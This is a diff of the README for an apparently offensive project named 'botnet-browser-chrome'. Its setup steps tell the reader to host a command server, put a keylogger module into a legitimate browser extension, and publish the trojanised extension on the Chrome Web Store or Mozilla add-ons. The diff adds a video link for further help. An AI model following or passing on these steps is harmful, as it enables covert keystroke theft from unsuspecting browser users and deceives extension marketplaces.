hakanonymos/botnet-browser-chrome/README.md

 change http://1127.0.0.1     to your web server

-2) send folder named "server"   to your web server , test with wampserver or xhampp
+2) send folder named " server "   to your web server , test with wampserver or xhampp ......etc

-3) take a legitimate extension then add your keylogger module, if you have questions how does it work ask me in comment
+3) take a legitimate extension then add your keylogger module, if you have questions how does it work ask me in comment or you can see this video https://www.youtube.com/watch?v=CC4Ba3LxqCc&t=384s

 4) publish your extension one chrome web store or adon mozilla